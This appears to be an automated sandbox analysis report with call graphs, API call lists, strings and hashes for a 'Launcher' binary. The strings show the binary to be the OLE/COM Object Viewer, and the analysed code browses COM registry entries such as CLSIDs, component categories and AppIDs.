__ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 7905->7906 7908 b6776f 7906->7908 7908->7865 7909->7905 7911 b6746b 7910->7911 7912 b67749 7910->7912 7913 b67481 RegEnumKeyW 7911->7913 7917 b5b3d0 2 API calls 7911->7917 7918 b63e89 2 API calls 7911->7918 7919 b67538 7911->7919 7912->7909 7914 b674a4 RegQueryValueW 7913->7914 7915 b6773d RegCloseKey 7913->7915 7914->7911 7916 b67738 7914->7916 7915->7912 7916->7915 7917->7911 7918->7911 7920 b67560 CLSIDFromString 7919->7920 7926 b67578 7919->7926 7921 b675d8 wcstol wcsrchr 7920->7921 7922 b67665 7921->7922 7923 b67643 wcstol 7921->7923 7924 b67683 wsprintfW 7922->7924 7925 b6769f wsprintfW 7922->7925 7923->7922 7924->7925 7927 b67731 7925->7927 7926->7921 8025 b67f0b SendMessageW 7927->8025 7930 b66c90 7929->7930 7931 b66cb2 7929->7931 7932 b66c9c 7930->7932 7933 b66cbd 7930->7933 7948 b66d47 7931->7948 8046 b678fa SendMessageW 7931->8046 8026 b65010 7932->8026 7935 b64899 33 API calls 7933->7935 7937 b66cdc 7935->7937 7937->7931 7939 b66ceb #540 7937->7939 7938 b66d7d 8047 b69230 SendMessageW 7938->8047 8045 b5b3f4 7939->8045 7941 b66d08 #2810 7942 b6d91d 17 API calls 7941->7942 7945 b66d2f #800 7942->7945 7943 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 7946 b673ac 7943->7946 7945->7931 7946->7865 7947 b66db9 RegOpenKeyW 7947->7948 7950 b66e2d malloc 7947->7950 7948->7943 7953 b66e8d 7950->7953 7954 b66e99 7950->7954 7951 b67351 RegCloseKey 7951->7948 7952 b66eb8 malloc 7952->7953 7952->7954 7953->7951 7956 b67344 free 7953->7956 7957 b67328 free 7953->7957 7954->7952 7965 b66ef2 7954->7965 7956->7951 7957->7953 7958 b66f23 RegEnumKeyW 7958->7965 7959 b66f5d CLSIDFromString 7959->7965 7960 b6712c StringFromGUID2 7960->7965 7961 b6716e lstrcpyW RegQueryValueW 7961->7965 7962 b671c6 wsprintfW 7962->7965 7963 b5b3d0 2 API calls 7963->7965 7964 b63e89 2 API calls 7964->7965 7965->7953 7965->7958 7965->7959 7965->7960 7965->7961 7965->7962 7965->7963 7965->7964 8048 b67f0b SendMessageW 7965->8048 7968 b65f52 RegOpenKeyW 7967->7968 7969 b659a8 7967->7969 7980 b65f71 7968->7980 7989 b6637d 7968->7989 7969->7968 7970 b659c4 StringFromGUID2 7969->7970 8049 b5b696 7970->8049 7972 b65f87 RegEnumKeyW 7974 b66371 RegCloseKey 7972->7974 7972->7980 7973 b659e3 lstrcpyW CoCreateInstance 7975 b65f10 #538 7973->7975 7987 b65a26 7973->7987 7974->7989 7978 b6d91d 17 API calls 7975->7978 7976 b6600c 7981 b5b3d0 2 API calls 7976->7981 7977 b65fba wsprintfW RegOpenKeyW 7979 b66000 RegCloseKey 7977->7979 7977->7980 7982 b65f39 #800 7978->7982 7979->7976 7980->7972 7980->7976 7980->7977 7983 b66016 7981->7983 7982->7968 7984 b66037 7983->7984 7985 b63e89 2 API calls 7983->7985 7986 b67a11 41 API calls 7984->7986 7985->7984 7992 b66074 7986->7992 7988 b65e13 #538 7987->7988 8020 b65ae3 7987->8020 7990 b6d91d 17 API calls 7988->7990 7997 b65edf 7989->7997 8053 b691ad ResumeThread 7989->8053 7991 b65e3c #800 7990->7991 8009 b65e11 7991->8009 7996 b66303 7992->7996 7998 b661d0 7992->7998 8000 b6f604 4 API calls 7992->8000 7993 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 7995 b66429 7993->7995 7995->7856 7996->7974 7997->7993 7999 b661d7 RegQueryValueW 7998->7999 8001 b6620c 7999->8001 8002 b6623a 7999->8002 8000->7999 8001->8002 8004 b6621e wsprintfW 8001->8004 8052 b67f0b SendMessageW 8002->8052 8003 b5b3d0 2 API calls 8003->8020 8004->8002 8006 b63e89 2 API calls 8006->8020 8007 b65b69 StringFromGUID2 8007->8020 8008 b67a11 41 API calls 8008->8020 8009->7997 8051 b691ad ResumeThread 8009->8051 8010 b66292 8010->7996 8013 b662d7 #1083 8010->8013 8011 b65bf4 #537 8011->8020 8012 b6f604 4 API calls 8012->8011 8013->7996 8014 b65c45 #925 8014->8020 8016 b65c99 RegQueryValueW 8016->8020 8017 b65cec #800 8017->8020 8018 b65d0d #800 8018->8020 8019 b65d2a wsprintfW 8019->8020 8020->8003 8020->8006 8020->8007 8020->8008 8020->8009 8020->8011 8020->8012 8020->8014 8020->8016 8020->8017 8020->8018 8020->8019 8022 b65dd4 #1083 8020->8022 8050 b67f0b SendMessageW 8020->8050 8022->8020 8023->7877 8024->7891 8025->7916 8027 b69137 CoFreeUnusedLibraries 8026->8027 8028 b65049 #540 8027->8028 8029 b65067 CoGetClassObject 8028->8029 8030 b65088 CoGetClassObject 8028->8030 8031 b650a6 8029->8031 8030->8031 8032 b650c1 8031->8032 8033 b650ac #860 #1262 8031->8033 8034 b650c7 #860 #1262 8032->8034 8035 b650dc 8032->8035 8033->8032 8034->8035 8036 b65125 8035->8036 8037 b65110 #860 #1262 8035->8037 8038 b65143 8036->8038 8039 b6512e #860 #1262 8036->8039 8037->8036 8040 b651b3 8038->8040 8041 b6519e #860 #1262 8038->8041 8039->8038 8042 b651bc #860 #1262 8040->8042 8043 b651d1 #800 8040->8043 8041->8040 8042->8043 8043->7931 8045->7941 8046->7938 8047->7947 8048->7965 8049->7973 8050->8020 8051->7997 8052->8010 8053->7997 8054 b60d60 8055 b60d6c __EH_prolog3 8054->8055 8056 b6de06 2 API calls 8055->8056 8057 b60d76 8056->8057 8058 b60d8a 8057->8058 8060 b61536 8057->8060 8065 b6f3e2 8060->8065 8062 b61542 #366 #527 #529 #554 8066 b615a4 #439 8062->8066 8064 b6158e 8064->8058 8065->8062 8066->8064 8067 b616c0 #2244 8068 b61775 8067->8068 8069 b616ee 8067->8069 8069->8068 8070 b6173e #3476 #3476 #5848 #5906 8069->8070 8070->8068 8071 b60cc0 #4704 SendMessageW SendMessageW #2634 #2634

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B5B90F
                                                                                                                • #540.MFC42U(000005AC,00B5B566,00000000,00000011), ref: 00B5B91D
                                                                                                                • #4155.MFC42U(00000004,000005AC,00B5B566,00000000,00000011), ref: 00B5B92F
                                                                                                                • StringFromGUID2.OLE32(00B536E4,?), ref: 00B5B949
                                                                                                                • wsprintfW.USER32 ref: 00B5B95F
                                                                                                                • RegQueryValueW.ADVAPI32(80000000,?,?,?), ref: 00B5B982
                                                                                                                • #540.MFC42U ref: 00B5B998
                                                                                                                • #540.MFC42U ref: 00B5B9A7
                                                                                                                • #538.MFC42U(Comcat.DLL), ref: 00B5B9BB
                                                                                                                • LoadLibraryW.KERNEL32(?,Comcat.DLL), ref: 00B5BAAE
                                                                                                                • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00B5BAC5
                                                                                                                • #4155.MFC42U(00000019), ref: 00B5BB0C
                                                                                                                • #4155.MFC42U(00000018,00000019), ref: 00B5BB19
                                                                                                                • #940.MFC42U(?,00000018,00000019), ref: 00B5BB2B
                                                                                                                • #1197.MFC42U(?,00000000,00000000,?,00000018,00000019), ref: 00B5BB38
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000000,?,00000018,00000019), ref: 00B5BB3E
                                                                                                                • #6398.MFC42U(?,Version,0000003D,00000001,comcat.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,0000001A,?,00000018), ref: 00B5BB5B
                                                                                                                • #800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 00B5BB66
                                                                                                                • #800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 00B5BB71
                                                                                                                • #800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 00B5BB7C
                                                                                                                • #800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 00B5BB87
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #800$#4155#540$Library$#1197#538#6398#940AddressFreeFromH_prolog3_LoadProcQueryStringValuewsprintf
                                                                                                                • String ID: CLSID\%s$Comcat.DLL$DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|$DllRegisterServer$Version$comcat.dll
                                                                                                                • API String ID: 446370969-4202070818
                                                                                                                • Opcode ID: 0a2087981d63cfc0a4a31ad41cecad142f9cd72f8b399f6cd7cce21b37d1078c
                                                                                                                • Instruction ID: 3b1d5225a324c673f4b6a00b2b36672aef27ab14ade964512c3ac7987e64f72d
                                                                                                                • Opcode Fuzzy Hash: 0a2087981d63cfc0a4a31ad41cecad142f9cd72f8b399f6cd7cce21b37d1078c
                                                                                                                • Instruction Fuzzy Hash: 84516D31A41658AECF21EB50CC92FEEB7B4AF25702F4001E9F54A66091DFB55F88CE12

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B5B4F7
                                                                                                                  • Part of subcall function 00B5B463: GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 00B5B468
                                                                                                                  • Part of subcall function 00B5B463: GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00B5B479
                                                                                                                • GetVersionExW.KERNEL32(00B737B0,00000004), ref: 00B5B512
                                                                                                                  • Part of subcall function 00B6BD2A: LoadLibraryW.KERNEL32(ACLUI.DLL,00B5B51D), ref: 00B6BD38
                                                                                                                  • Part of subcall function 00B6BD2A: MessageBoxW.USER32(00000000,Couldn't get address of EditSecurity ACLUI.DLL!,OLEViewer,00000000), ref: 00B6BD50
                                                                                                                  • Part of subcall function 00B6BD2A: exit.MSVCRT ref: 00B6BD58
                                                                                                                  • Part of subcall function 00B6BD2A: GetProcAddress.KERNEL32(00000000,EditSecurity), ref: 00B6BD64
                                                                                                                • #1202.MFC42U ref: 00B5B51D
                                                                                                                • #538.MFC42U(OleInitialize failed. Could not initialized OLE; OLEViewer cannot run.), ref: 00B5B530
                                                                                                                  • Part of subcall function 00B6D91D: __EH_prolog3.LIBCMT ref: 00B6D924
                                                                                                                  • Part of subcall function 00B6D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,00B6B9B7,?,00000000,00000000,00000000), ref: 00B6D942
                                                                                                                  • Part of subcall function 00B6D91D: #540.MFC42U ref: 00B6D94F
                                                                                                                  • Part of subcall function 00B6D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 00B6D96C
                                                                                                                  • Part of subcall function 00B6D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 00B6D97F
                                                                                                                  • Part of subcall function 00B6D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00B6D98C
                                                                                                                  • Part of subcall function 00B6D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00B6D997
                                                                                                                  • Part of subcall function 00B6D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 00B6D99F
                                                                                                                  • Part of subcall function 00B6D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 00B6D9AA
                                                                                                                  • Part of subcall function 00B6D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00B6DA13
                                                                                                                • #800.MFC42U(?,00000000,OleInitialize failed. Could not initialized OLE; OLEViewer cannot run.), ref: 00B5B546
                                                                                                                • #6112.MFC42U(00000011), ref: 00B5B556
                                                                                                                • #2613.MFC42U(00000000,00000011), ref: 00B5B571
                                                                                                                • #384.MFC42U(00000000,00000011), ref: 00B5B590
                                                                                                                • #2089.MFC42U(000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00B5B5B2
                                                                                                                • #1197.MFC42U(Could not load bitmaps,00000000,00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00B5B5C2
                                                                                                                • #520.MFC42U(00000002,00B53458,00B540EC,00B54A54,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00B5B5EE
                                                                                                                • #986.MFC42U(00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00B5B5FE
                                                                                                                • #4604.MFC42U(00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00B5B60B
                                                                                                                • #1197.MFC42U(Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator.,00000000,00000000,00000000,00000000,00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 00B5B640
                                                                                                                • #5977.MFC42U ref: 00B5B688
                                                                                                                Strings
                                                                                                                • Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator., xrefs: 00B5B63B
                                                                                                                • OleInitialize failed. Could not initialized OLE; OLEViewer cannot run., xrefs: 00B5B528
                                                                                                                • Could not load bitmaps, xrefs: 00B5B5BD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1197#800$AddressH_prolog3MessageProc$#1202#2089#2613#2810#384#4604#520#538#540#5977#6112#858#922#986FormatFreeHandleLibraryLoadLocalModuleVersionexit
                                                                                                                • String ID: Could not load bitmaps$OleInitialize failed. Could not initialized OLE; OLEViewer cannot run.$Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator.
                                                                                                                • API String ID: 800470354-1540245615
                                                                                                                • Opcode ID: 3fe476853f77c4ad5360ea63de53f20624ed23ec140659e24c3c1524b5b0ca73
                                                                                                                • Instruction ID: 97ad82d11c8eb0ea349747fbbbbec111960c1d306bc62fc6c36af0088b7f21fd
                                                                                                                • Opcode Fuzzy Hash: 3fe476853f77c4ad5360ea63de53f20624ed23ec140659e24c3c1524b5b0ca73
                                                                                                                • Instruction Fuzzy Hash: A041E270B002059BDB18BBB49C97F3D62E5AF44701F1444E9B922AB2D2DFB8CD489711

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 404 b6642d-b664d6 CoCreateInstance 405 b664dc-b66527 GetUserDefaultLCID 404->405 406 b66738-b66758 RegOpenKeyW 404->406 420 b6652d-b66535 405->420 421 b6670a-b66733 405->421 407 b66923-b66939 call b6f3a0 406->407 408 b6675e-b66791 RegEnumKeyW 406->408 413 b66917-b6691d RegCloseKey 408->413 414 b66797-b667b3 RegOpenKeyW 408->414 413->407 415 b66912 414->415 416 b667b9-b667e8 RegQueryValueExW 414->416 418 b66906-b6690c RegCloseKey 416->418 419 b667ee-b667fe 416->419 418->415 423 b66800-b66819 wsprintfW 419->423 424 b6681c-b6683a call b5b3d0 419->424 422 b6653d-b66573 420->422 421->407 436 b666e1-b66704 422->436 437 b66579-b6659f StringFromGUID2 422->437 423->424 429 b6684f 424->429 430 b6683c-b6684d call b63e89 424->430 434 b66856-b66893 call b67a11 429->434 430->434 444 b66895-b6689b 434->444 445 b668a2-b66901 call b679ae call b67f0b 434->445 436->421 439 b665b5-b665d7 wsprintfW 437->439 440 b665a1-b665b3 call b5b696 437->440 446 b665dd-b665f0 439->446 440->446 444->445 445->418 449 b665f2-b665fc 446->449 450 b66603-b6661e call b5b3d0 446->450 449->450 452 b665fe 449->452 456 b66633 450->456 457 b66620-b66631 call b63e89 450->457 452->422 459 b6663a-b66669 call b5b696 call b67a11 456->459 457->459 464 b6666e-b66670 459->464 465 b66672-b66678 464->465 466 b6667f-b666dc call b679ae call b67f0b 464->466 465->466 466->422
                                                                                                                APIs
                                                                                                                • CoCreateInstance.OLE32(00B536E4,00000000,00000001,00B536F4,00000000), ref: 00B664C3
                                                                                                                • GetUserDefaultLCID.KERNEL32(00000000), ref: 00B664EA
                                                                                                                • StringFromGUID2.OLE32(?,?,00000050), ref: 00B66589
                                                                                                                • wsprintfW.USER32 ref: 00B665C8
                                                                                                                • RegOpenKeyW.ADVAPI32(80000000,Component Categories,00000000), ref: 00B66750
                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000050), ref: 00B66789
                                                                                                                • RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 00B667AB
                                                                                                                • RegQueryValueExW.ADVAPI32(?,409,00000000,00000000,?,00000200), ref: 00B667E0
                                                                                                                • wsprintfW.USER32 ref: 00B66813
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00B6690C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Openwsprintf$CloseCreateDefaultEnumFromInstanceQueryStringUserValue
                                                                                                                • String ID: %s <no name>$409$Component Categories$_%S <no name>$g
                                                                                                                • API String ID: 3086071695-2486616072
                                                                                                                • Opcode ID: e29c87c524b7a8fb417ed31a5a6cc2c7449d412b68e728dc01a2e5ea2a4bdfc0
                                                                                                                • Instruction ID: c131607e0d5abf288f268f83f197008bff851bac589b457434f46512bfa17a15
                                                                                                                • Opcode Fuzzy Hash: e29c87c524b7a8fb417ed31a5a6cc2c7449d412b68e728dc01a2e5ea2a4bdfc0
                                                                                                                • Instruction Fuzzy Hash: 29E1C971A00218DFDB60DF64DC45BA9B7FABB98315F1041EAE409E7290DB769EA4CF10

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 b5dba0-b5dbbe 1 b5dbc4-b5dbd1 0->1 2 b5e15d-b5e16b call b6f3a0 0->2 4 b5dc21-b5dc3f #1662 lstrcmpW 1->4 5 b5dbd3-b5dc1c #6195 #1143 LoadIconW SendMessageW #6195 call b5e409 1->5 8 b5dc41-b5dc98 #6195 * 2 #1143 LoadIconW SendMessageW call b69b32 call b5e466 4->8 9 b5dc9d-b5dcb8 memcmp 4->9 5->2 39 b5e156-b5e158 #2644 8->39 12 b5dcbe-b5dccd 9->12 13 b5de59-b5de8e StringFromGUID2 #6195 * 2 9->13 14 b5dce1-b5dcee #6195 12->14 15 b5dccf-b5dcdf #6195 12->15 16 b5deb0-b5deb3 13->16 17 b5de90-b5deab call b69b32 call b5e466 13->17 19 b5dcef-b5dd30 #1143 LoadIconW SendMessageW #6195 14->19 15->19 22 b5deb5-b5decd call b69b32 call b5e466 16->22 23 b5ded2-b5ded5 16->23 55 b5e136-b5e142 #1143 LoadIconW 17->55 24 b5dda6-b5dda9 19->24 25 b5dd32-b5dd51 RegOpenKeyExW 19->25 22->55 26 b5def7-b5defa 23->26 27 b5ded7-b5def2 call b69b32 call b5e466 23->27 37 b5dde7-b5dde9 call b5e409 24->37 38 b5ddab-b5dde5 call b69b32 call b5e466 #1143 LoadIconW SendMessageW 24->38 31 b5dd53-b5dd8c #6195 #1143 LoadIconW SendMessageW RegCloseKey 25->31 32 b5dd92-b5dda4 call b69b32 call b5e466 25->32 34 b5df00-b5df03 26->34 35 b5e11e-b5e134 call b69b32 call b5e466 26->35 27->55 31->32 50 b5ddee-b5de04 lstrcmpW 32->50 34->35 46 b5df09-b5dfbf call b69b32 call b5c6a6 call b60b66 call b5f616 call b5cb16 call b5e1a4 wsprintfW RegOpenKeyExW 34->46 35->55 37->50 38->50 39->2 46->39 80 b5dfc5-b5dff0 RegQueryValueW 46->80 57 b5de06-b5de25 #1143 LoadIconW SendMessageW 50->57 58 b5de2b-b5de3b lstrcmpW 50->58 63 b5e144 55->63 57->58 58->39 65 b5de41-b5de54 #1143 LoadIconW 58->65 69 b5e145-b5e150 SendMessageW 63->69 65->63 69->39 81 b5dff6-b5e00a call b6dc89 80->81 82 b5e079-b5e08e call b5d944 80->82 89 b5e01d-b5e027 81->89 90 b5e00c-b5e012 81->90 87 b5e090-b5e0a5 call b5d944 82->87 88 b5e0fe-b5e10d RegCloseKey 82->88 87->88 99 b5e0a7-b5e0bc call b5d944 87->99 91 b5e113-b5e117 88->91 92 b5e10f-b5e111 88->92 95 b5e057-b5e073 #1165 ExtractIconW 89->95 96 b5e029-b5e050 lstrcpyW wcsrchr 89->96 90->89 94 b5e014-b5e019 90->94 91->35 92->69 94->89 95->82 95->88 96->95 98 b5e052-b5e054 96->98 98->95 99->88 102 b5e0be-b5e0d3 call b5d944 99->102 102->88 105 b5e0d5-b5e0ea call b5d944 102->105 105->88 108 b5e0ec-b5e0fc call b5d944 105->108 108->88
                                                                                                                APIs
                                                                                                                • #6195.MFC42U(00B521A0), ref: 00B5DBDB
                                                                                                                • #1143.MFC42U(00000093,0000000E,00000093,00B521A0), ref: 00B5DBE9
                                                                                                                • LoadIconW.USER32(00000000,00000093), ref: 00B5DBEF
                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B5DC03
                                                                                                                • #6195.MFC42U(00B521A0), ref: 00B5DC10
                                                                                                                  • Part of subcall function 00B5E409: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00B5E41E
                                                                                                                  • Part of subcall function 00B5E409: SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5E436
                                                                                                                  • Part of subcall function 00B5E409: SendMessageW.USER32(?,00001309,00000000,00000000), ref: 00B5E451
                                                                                                                  • Part of subcall function 00B5E409: #6211.MFC42U(00000000), ref: 00B5E45E
                                                                                                                • #1662.MFC42U ref: 00B5DC2A
                                                                                                                • lstrcmpW.KERNEL32(?,Application IDs), ref: 00B5DC37
                                                                                                                • #6195.MFC42U(Application IDs), ref: 00B5DC4C
                                                                                                                • #6195.MFC42U(All HKEY_CLASSES_ROOT\APPID Entries,Application IDs), ref: 00B5DC58
                                                                                                                • #1143.MFC42U(00000094,0000000E,00000094,All HKEY_CLASSES_ROOT\APPID Entries,Application IDs), ref: 00B5DC66
                                                                                                                • LoadIconW.USER32(00000000,00000094), ref: 00B5DC6C
                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B5DC80
                                                                                                                • #2644.MFC42U ref: 00B5E158
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#6195$#1143IconLoad$#1662#2644#6211lstrcmp
                                                                                                                • String ID: All HKEY_CLASSES_ROOT\APPID Entries$All HKEY_CLASSES_ROOT\Component Categories Entries$Application IDs$CLSID\%s$Component Categories$DefaultIcon$InprocHandler$InprocHandler32$InprocServer$InprocServer32$Interfaces$LocalServer$LocalServer32$No CLSID available.$Type Libraries
                                                                                                                • API String ID: 3415864282-4228781962
                                                                                                                • Opcode ID: 8849dab3ede4d63219d26b9a84ab49880438acc2d19c79161f2da1ec37292fdb
                                                                                                                • Instruction ID: c8869c03519194cb03a7a33c536d90bb6999ea6c8fe36712f87437c764291b37
                                                                                                                • Opcode Fuzzy Hash: 8849dab3ede4d63219d26b9a84ab49880438acc2d19c79161f2da1ec37292fdb
                                                                                                                • Instruction Fuzzy Hash: 5BE18471A40214ABEB25BB20DC46FAA36E9EF45702F0404F8FD19BB192DF749E498B54

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 111 b5f616-b5f6a7 call b6f415 #540 StringFromGUID2 SendMessageW call b6d67d 116 b5f6ae-b5f6fa #861 call b6d67d 111->116 117 b5f6a9 111->117 120 b5f6fc 116->120 121 b5f6fe-b5f715 #6195 116->121 117->116 120->121 122 b5f98d-b5f9cd call b6d67d 121->122 123 b5f71b-b5f71e 121->123 135 b5f9d4-b5f9f1 #861 #2756 122->135 136 b5f9cf 122->136 124 b5f944-b5f97b call b6d67d 123->124 125 b5f724-b5f727 123->125 138 b5f982 124->138 139 b5f97d 124->139 127 b5f7f7-b5f82e call b6d67d 125->127 128 b5f72d-b5f730 125->128 148 b5f830-b5f846 #861 127->148 149 b5f84c-b5f856 #861 127->149 131 b5f736-b5f782 #3087 #2634 call b6d67d 128->131 132 b5fc33-b5fc3c call b5f090 call b6020e 128->132 155 b5f784 131->155 156 b5f789-b5f7d0 #861 call b6d67d 131->156 162 b5fc41-b5fc5a #6330 #800 call b6f3c4 132->162 142 b5f9f3-b5fa02 #2756 135->142 143 b5fa1b-b5fa6e SendMessageW call b6d67d 135->143 136->135 138->122 139->138 142->143 144 b5fa04-b5fa19 SendMessageW 142->144 152 b5fa82-b5fad1 #2634 call b6d67d 143->152 159 b5fa70-b5fa7d #861 143->159 144->152 150 b5f863-b5f898 call b6d67d 148->150 151 b5f848-b5f84a 148->151 153 b5f858-b5f85e #2634 149->153 168 b5f927 150->168 169 b5f89e-b5f8b2 lstrcmpiW 150->169 151->153 170 b5fad7-b5faeb lstrcmpiW 152->170 171 b5fb60 152->171 153->150 155->156 172 b5f7d7-b5f7f2 #861 #2634 156->172 173 b5f7d2 156->173 159->152 174 b5f92c-b5f933 168->174 176 b5f8b4-b5f8b9 169->176 177 b5f8bb-b5f8cf lstrcmpiW 169->177 178 b5faf4-b5fb08 lstrcmpiW 170->178 179 b5faed-b5faf2 170->179 175 b5fb65-b5fb6c 171->175 180 b5fc28-b5fc2e #2634 172->180 173->172 181 b5f939 SendMessageW 174->181 182 b5fb72-b5fbb5 SendMessageW call b6d605 175->182 176->174 183 b5f8d1-b5f8d6 177->183 184 b5f8d8-b5f8ec lstrcmpiW 177->184 185 b5fb11-b5fb25 lstrcmpiW 178->185 186 b5fb0a-b5fb0f 178->186 179->175 180->132 181->124 199 b5fbb7-b5fbce SendMessageW 182->199 200 b5fbd0-b5fbe0 SendMessageW 182->200 183->174 188 b5f8f5-b5f90f lstrcmpiW 184->188 189 b5f8ee-b5f8f3 184->189 190 b5fb27-b5fb2c 185->190 191 b5fb2e-b5fb48 lstrcmpiW 185->191 186->175 193 b5f911 188->193 194 b5f920-b5f925 188->194 189->174 190->175 195 b5fb59-b5fb5e 191->195 196 b5fb4a 191->196 197 b5f916-b5f91e 193->197 194->197 198 b5fb4f-b5fb57 195->198 196->198 197->181 198->182 201 b5fbe5-b5fc26 #861 #3087 #2634 #3087 #2634 * 2 199->201 200->201 201->180
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B5F620
                                                                                                                • #540.MFC42U(0000025C,00B5DF5F), ref: 00B5F637
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028,0000025C,00B5DF5F), ref: 00B5F64D
                                                                                                                • SendMessageW.USER32(?,0000014D,000000FF,None), ref: 00B5F669
                                                                                                                • #861.MFC42U(?), ref: 00B5F6B5
                                                                                                                • #6195.MFC42U(?,?,?,?,?), ref: 00B5F705
                                                                                                                • #3087.MFC42U(0000008B,00000001,?,?,?,?,?), ref: 00B5F73F
                                                                                                                • #2634.MFC42U(0000008B,00000001,?,?,?,?,?), ref: 00B5F746
                                                                                                                • #861.MFC42U(?,?,0000008B,00000001,?,?,?,?,?), ref: 00B5F790
                                                                                                                • #861.MFC42U(?,?,?,?,?,?,0000008B,00000001,?,?,?,?,?), ref: 00B5F7DE
                                                                                                                • #2634.MFC42U(00000000,?,?,?,?,?,?,0000008B,00000001,?,?,?,?,?), ref: 00B5F7EB
                                                                                                                • #861.MFC42U(?,00B521A0,?,00000100,?,?,?,?,?), ref: 00B5F837
